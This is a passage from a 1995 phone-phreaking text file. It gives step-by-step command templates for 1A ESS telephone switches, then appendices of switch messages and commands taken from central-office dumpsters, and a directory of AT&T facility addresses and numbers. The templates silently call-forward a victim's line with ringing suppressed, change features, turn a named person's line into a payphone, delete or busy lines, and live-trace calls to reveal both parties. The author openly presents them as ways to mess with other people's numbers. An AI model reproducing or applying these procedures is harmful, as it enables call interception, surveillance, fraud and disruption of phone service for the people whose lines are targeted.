XXXXXXXXXX ) PFX\ (set prefix to 1 if ld) ! (BEWM) To Change Call Forward Number -=-=-=-=-=-=-=-=-=-=-=-=-=-=- It is safer to modify an existing call forward than to create a new line solely for this purpose. You can use the VFY command and EXMATCH for CFB to find lines with call forwarding. Before you can change the call forwarding 'TO' number you must delete the old one. Remove call forward number using CFV:OUT with the template below. RC:CFV;OUT:\ (remove call forward number...begin: ) ORD 1\ (execute command immediately) BASE XXXXXXX\ (number to remove it from) ! (Yeeee-Hahhhahah) Make Call Forward Not Ring -=-=-=-=-=-=-=-=-=-=-=-=-= The only drawback to call forwarding off someone's line is if rings they might answer. To get around this, you add the call-forward no-ring option (ICFRR) using the following as a template. RC:LINE;CHG:\ (recent change line to be specified) ORD 1\ (execute command immediately) TN XXXXXXX\ (number you wanna fuck with) ICFRR\ (this takes the ring off) ! (Go!) Adding a feature to a line -=-=-=-=-=-=-=-=-=-=-=-=-= The RC:LINE;CHG: can also be used to add any other call feature. Use the same template but change the feature. RC:LINE;CHG:\ (this is used for changing features) ORD 1\ (order number) TN XXXXXXX (telephone number you are fucking with) TWC\ (replace this with any feature you wish) ! (Fire!) Removing a Feature -=-=-=-=-=-=-=-=-= Use the NO delimiter to remove a feature from a line. RC:LINE;CHG:\ (change a feature) ORD 1\ (effective immediately) TN XXXXXXX\ (telephone number) CFV NO\ (feature followed by NO) ! (Boo-Ya!) Change Phone number into payphone -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- You've read about in the Hacker Crackdown, now you too can be 31337 and change Gail Thackery's phone into a payphone. In fact you can change the line class code (LCC) to anything you want. To display the LCC of a line use the following and replace the XXXXXXX with the line you wish to view. VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code) DTF = Payphone 1FR = Flat Rate 1MR = Measured Rate 1PC = One Pay Phone CDF = DTF Coin PBX = Private Branch Exchange CFD = Coinless(ANI7) Charge-a-call INW = InWATS (800!@#) OWT = OutWATS PBM = O HO/MO MSG REG (NO ANI) PMB = LTG = 1 HO/MO (Regular ANI6) (ani6 and ani7 - only good for DMS) To change the line into a payphone use the RC:LINE;CHG command and modify the LCC like the example below. RC:LINE;CHG;\ (this is used for changing features) ORD 1\ (order number) TN XXXXXXX\ (telephone number you are fucking with) LCC DTF\ (line class code you are changing to) ! (Make it so.) *(You may have to remove some LASS features when doing this)* To Kill a Line and Remove It Permanently -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= If you need to delete a line you have created (or haven't) use the following syntax. RC:LINE;OUT:\ (remove line) ORD 1\ (effective immediately) TN XXXXXXX\ (on this number) ! (GO!) Monitoring Phone Calls -=-=-=-=-=-=-=-=-=-=-= There are powerful utilities to monitor calls and affect phone lines available on a 1A. The T-DN- commands allow you to check the current status of line and make it busy or idle. If a line happens to be active you can use the NET-LINE- command to trace the call and find the numbers for both calling parties. T-DN-RD XXXXXXX. See if call in progress. output: =1 line busy =0 line idle T-DN-MB XXXXXXX. Make line busy. T-DN-MI XXXXXXX. Make line idle. NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru switch. NET-TNN-XXXXXX Same as above for trunk trace -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Appendix 1 - Common output messages seen on 1A switches -=-=-=-=-= ** ALARM ** AR01 Office alarm AR02 Alarm retired or transferred AR03 Fuse blown AR04 Unknown alarm scan point activated AR05 Commercial power failure AR06 Switchroom alarm via alarm grid AR07 Power plant alarm AR08 Alarm circuit battery loss AR09 AMA bus fuse blown AR10 Alarm configuration has been changed (retired,inhibited) AR11 Power converter trouble AR13 Carrier group alarm AR15 Hourly report on building and power alarms ** AUTOMATIC TRUNK TEST ** AT01 Results of trunk test ** CARRIER GROUP ** CG01 Carrier group in alarm CG03 Reason for above ** COIN PHONE ** CN02 List of pay phones with coin disposal problems CN03 Possible Trouble CN04 Phone taken out of restored service because of possible coin fraud ** COPY ** COPY Data copied from one address to another ** CALL TRACE ** CT01 Manually requested trace line to line, information follows CT02 Manually requested trace line to trunk, information follows CT03 Intraoffice call placed to a number with CLID CT04 Interoffice call placed to a number with CLID CT05 Call placed to number on the CI list CT06 Contents of the CI list CT07 ACD related trace CT08 ACD related trace CT09 ACD related trace ** DIGITAL CARRIER TRUNK ** DCT COUNTS Count of T carrier errors ** MEMORY DIAGNOSTICS ** DGN Memory failure in cs/ps diagnostic program ** DIGITAL CARRIER "FRAME" ERRORS ** FM01 DCT alarm activated or retired FM02 Possible failure of entire bank not just frame FM03 Error rate of specified digroup FM04 Digroup out of frame more than indicated FM05 Operation or release of the loop terminal relay FM06 Result of digroup circuit diagnostics FM07 Carrier group alarm status of specific group FM08 Carrier group alarm count for digroup FM09 Hourly report of carrier group alarms FM10 Public switched digital capacity failure FM11 PUC counts of carrier group errors ** MAINTENANCE ** MA02 Status requested, print out of MACII scratch pad MA03 Hourly report of system circuits and units in trouble MA04 Reports condition of system MA05 Maintenance interrupt count for last hour MA06 Scanners,network and signal distributors in trouble MA07 Successful switch of duplicated unit (program store etc.) MA08 Excessive error rate of named unit MA09 Power should not be removed from named unit MA10 OK to remove paper MA11 Power manually removed from unit MA12 Power restored to unit MA13 Indicates central control active MA15 Hourly report of # of times interrupt recovery program acted MA17 Centrex data link power removed MA21 Reports action taken on MAC-REX command MA23 4 minute report, emergency action phase triggers are inhibited ** MEMORY ** MN02 List of circuits in trouble in memory ** NETWORK TROUBLE ** NT01 Network frame unable to switch off line after fault detection NT02 Network path trouble Trunk to Line NT03 Network path trouble Line to Line NT04 Network path trouble Trunk to Trunk NT06 Hourly report of network frames made busy NT10 Network path failed to restore ** OPERATING SYSTEM STATUS ** OP:APS-0 OP:APSTATUS OP:CHAN OP:CISRC Source of critical alarm, automatic every 15 minutes OP:CSSTATUS Call store status OP:DUSTATUS Data unit status OP:ERAPDATA Error analysis database output OP:INHINT Hourly report of inhibited devices OP:LIBSTAT List of active library programs OP:OOSUNITS Units out of service OP:PSSTATUS Program store status ** PLANT MEASUREMENTS ** PM01 Daily report PM02 Monthly report PM03 Response to a request for a specific section of report PM04 Daily summary of IC/IEC irregularities ** REPORT ** REPT:ADS FUNCTION Reports that a ADS function is about to occur REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned REPT:ADS FUNCTION STATE CHANGE Change in state of ADS REPT:ADS PROCEDURAL ERROR You fucked up REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable REPT:PROG CONT OFF-NORMAL System programs that are off or on REPT:RC CENSUS Hourly report on recent changes REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited) ** RECENT CHANGE ** RC18 RC message response ** REMOVE ** RMV Removed from service ** RESTORE ** RST Restored to service status ** RINGING AND TONE PLANT ** RT04 Status of monitors ** SOFTWARE AUDIT ** SA01 Call store memory audit results SA03 Call store memory audit results ** SIGNAL IRREGULARITY ** SIG IRR Blue box detection SIG IRR INHIBITED Detector off SIG IRR TRAF Half hour report of traffic data ** TRAFFIC CONDITION ** TC15 Reports overall traffic condition TL02 Reason test position test was denied TL03 Same as above ** TRUNK NETWORK ** TN01 Trunk diagnostic found trouble TN02 Dial tone delay alarm failure TN04 Trunk diag request from test panel TN05 Trunk test procedural report or denials TN06 Trunk state change TN07 Response to a trunk type and status request TN08 Failed incoming or outgoing call TN09 Network relay failures TN10 Response to TRK-LIST input, usually a request from test position TN11 Hourly, status of trunk undergoing tests TN16 Daily summary of precut trunk groups ** TRAFFIC OVERLOAD CONDITION ** TOC01 Serious traffic condition TOC02 Reports status of less serious overload conditions ** TRANSLATION ** (shows class of service, calling features etc.) TR01 Translation information, response to VFY-DN TR03 Translation information, response to VFY-LEN TR75 Translation information, response to VF:DNSVY ** ** TW02 Dump of octal contents of memory Trace Output Appearance (COT - Customer Oriented Trace) A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED CPN 212 382 8923 <-- WHO CALLED 01/14/95 22:03:02 <-- TIME/DATE #236 <-- JOB NUMBER Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters: -=-=-=-=-= RMV::NPC 69! UTL::QRY.CMAP 136! UTL::QRY.SCON to 135! (as far out as to 12003!) UTL::QRY.SCON 13615/01! UTL::QRY.ALMS! UTL::QRY,WHO! UTL::QRY,ALL! UTL::QRY,FPKG! UTL::QRY,UNIT1,FTMI1, EQL GRTH::UNIT1! (FT100) <-- comment written by command GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example UTL::QRY.! RMV::LINK 3! DGN::LINK 3! RST::LINK 3! UTL::QRY.TPS! RST::TAPE! (This and the next two commands were UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty RMV::TAPE! obvious) SDIS::FROM 11204/03.TO 11204/04! UTL::QRY.SCON.CH.TO 11204! UTL::QRY.CMAP.TO 11204/03! UTL::QRY,CMAP 01117! SCON::RATE 96.FROM 11204/03.TO 11204/4! LOGIN::USER DAX\ UTL::EQD,NPCS! ADD::LINK 2,NPCAD E! UTL::LOC,ETSI 101! |_|____________Bay (These show physical locations |____________Unit of trunks) UTL::LOC,NPC 01117! output - 1-01-38 |__|__|_________Bay |__|_________Unit |_________38(1/8) inches Appendix 3 - Suggested reading -=-=-=-=-= Acronyms 1988 (Phrack #20, file 11) Central Office Operations by Agent Steal (LoDTJ #4, file 4) ESS & 1A Switching Systems by Ninja Master The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7) Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16) Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9) Operator Services Position System by Bandito (Phun #5, file 8) Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2) __________________________________________________________________________ (C)opywrong 1995, DeadKat Inc. All wrongs denied. ========= ßßßßßßßßß ßÄÄÄÄÄßßßßßßßßßß ßßÄÄÄÄÄÄÄÄßßßßßßßßßß ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ßßÄÄÄÄÄÄÄÄÄÄßßßßßßßßßß ³ Thank you for abusing AT&T ³ ßßÄÄÄÄÄÄÄÄÄÄÄßßßßßßßßßßß ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ßßßÄÄÄÄÄÄÄÄÄßßßßßßßßßßßß Part II ßßßÄÄÄÄÄÄßßßßßßßßßßßßß ßßßßßßßßßßßßßßßßßßßß by Major & Dead Kat ßßßßßßßßßßßßßßßß ßßßßßßßß Some of the "Frequently Visited AT&T Locations": LOCATION CITY ST/ZIP TELEPHONE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~ AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000 BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300 MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200 AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000 LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411 AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000 PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000 AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100 PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666 AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100 AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799 LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000 CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200 AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223 AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390 VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611 AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649 AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200 AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000 AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200 SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000 HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000 AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000 AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000 SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300 AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800 PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911 AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600 DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000 AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000 AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000 AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001 DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200 DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200 AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813 AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011 AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100 AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000 AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800 AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200 AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800 ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721 CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070 AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600 AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300 WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000 AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000 AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454 AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200 AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200 AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200 AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200 AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400 AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000 AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000 AT&T MICROELECT.9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000 AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100 AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100 ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000 AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200 AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000 AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000 ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000 ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000 AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126 ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000 ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900 AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800 ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100 ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000 AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200 AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300 ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000 AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300 AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000 AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100 AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100 AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000 AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320 UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900 NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000 NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000 LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005 AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000 CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000 MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000 WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000 INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000 IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000 AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558 AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674 INDIANAPOLIS INST.8700ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160 INDIANA AMO N. 151 N.DELAWARE ST. SUITE565 INDIANAPOL IN 46204 317-632-9161 INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011 INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980 AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000 KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000 AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840 AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500 AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000 AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300 AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600 AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041 SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000 AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400 AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161 ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000 AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600 MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000 AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800 AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870 AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000 NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765 AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000 BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000 AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400 COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234 FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700 COULUMBIA MD 9305D GERWIG LN. COLUMBIA MD 21046 301-381-6150 AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700 TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425 AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400 AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210 AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200 NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400 AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200 AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803 MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750 AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300 AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600 BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000 ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000 AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400 AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500 KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000 KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000 NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110 REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100 BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000 GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000 NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775 AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800 AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301 AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023 AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050 AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001 OMAHA AMO 222 S. 15th.ST, SUITE 200 S. OMAHA NE 68124 402-595-5001 OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000 AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000 AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100 SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100 PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000 PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700 PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000 AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600 AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000 AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000 AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200 LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000 AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527 CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000 SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000 AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200 QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333 AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100 TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000 FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000 AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000 AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000 AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000 RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000 AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000 W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000 SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555 AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000 AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000 BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000 AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900 AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300 AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000 AT&T-COMM. TR. 202-206N. BEDMINSTER NJ 07921 201-234-4000 BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000 BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000 BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701 AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400 MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000 AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000 MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700 AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000 AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200 MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000 AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000 AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000 AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000 SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000 MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000 AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000 WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000 PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020 HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234 HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500 AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000 LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000 AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000 AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000 AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000 AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000 AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000 AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700 AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028 AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000 AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000 AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000 AT&T 371 HOES LN. PISCATAWAY NJ 08854 201-463-2200 AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900 AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300 AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200 HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000 AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300 SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678 AT&T 220 EDISON WAY RENO NV 89502 